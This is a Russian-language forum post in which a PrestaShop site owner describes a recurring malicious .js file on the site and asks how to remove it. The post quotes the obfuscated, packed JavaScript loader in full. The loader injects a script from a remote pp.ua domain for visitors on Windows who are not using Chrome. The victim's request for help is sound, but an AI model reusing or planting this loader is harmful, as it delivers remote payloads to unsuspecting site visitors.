Вирус на сайте. Помогите разобраться.

Всем доброго времени суток!

Поймал на сайте вирусню. Сайт на Престе. При загрузке страницы происходит подгрузка зараженного *.js файла и отправка данных на *.pp.ua сайт (постоянно меняется имя домена но всегда на регионе pp.ua). Удаляю этот файл через фтп, все становиться нормально, но через опред время картина повторяется и этот *.js файл появляется в другой папке и уже с другим названией.

Иногда меняется код в этом файле. И дата создания файла становится прошлым годом.

Вот пример:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 n(c){p(9.e&&9.k){4 i=9.k(\'10\')[0];4 7=9.e(\'1k\');7.j(\'1h\',\'1g/1n\');7.j(\'c\',c);i.K(7)}}6 r(5){b 5.g("I")==-1}4 V="&}1i#`-#~`O";4 W="Q;E{H$t%~";4 z="%3%N$U./:,M;)L> P*";4 R="*$$T]S(d,]J^B?$A]";4 C="2.*G>x*D";6 l(5){b 5.g(a)!=-1}4 F=")2:}y*#h[:?q)1f";4 1e="/(8%1c?;";4 1d=" 8/X]1m@1l?s";4 1j="^1b{U<1a~(<;0%;";4 12="11^/<,v*[Y^w~Z@";6 m(){b u.13()}4 o="14://19.18.5/17";4 a="a";6 f(){4 5=u.15.16();p(r(5)&&l(5)&&m()){n(o)}}f();',62,86,'||||var|ua|function|script_tag||document|win|return|src||createElement|includeCounter|indexOf||head_tag|setAttribute|getElementsByTagName|isWin|cond3|includeJavascript|url|if||notChrome|||navigator|||L8e||UBaCgDSx2|Kx_|r6h|UBaCgDSx4|Cz|_kCu|xNIeDzTx0||wcx|chrome|nmjl_|appendChild|QJh|_c|pH0|df0i|Uo||UBaCgDSx3|g6|zv||UBaCgDSx0|UBaCgDSx1|ZH5c7_|Evg|W2n|head|B1t|xNIeDzTx4|javaEnabled|http|userAgent|toLowerCase|12cb391bfe0e8937aaa86deb72a68|pp|ezoxal|WlBJ4Z|Dae8NC|NwwD|xNIeDzTx2|xNIeDzTx1|7W|text|type|0h|xNIeDzTx3|script|q8E|H5|javascript'.split('|'),0,{}))

Подскажите плиз порядок действий по борьбе с вирусней.

Всем спасибо за ответы!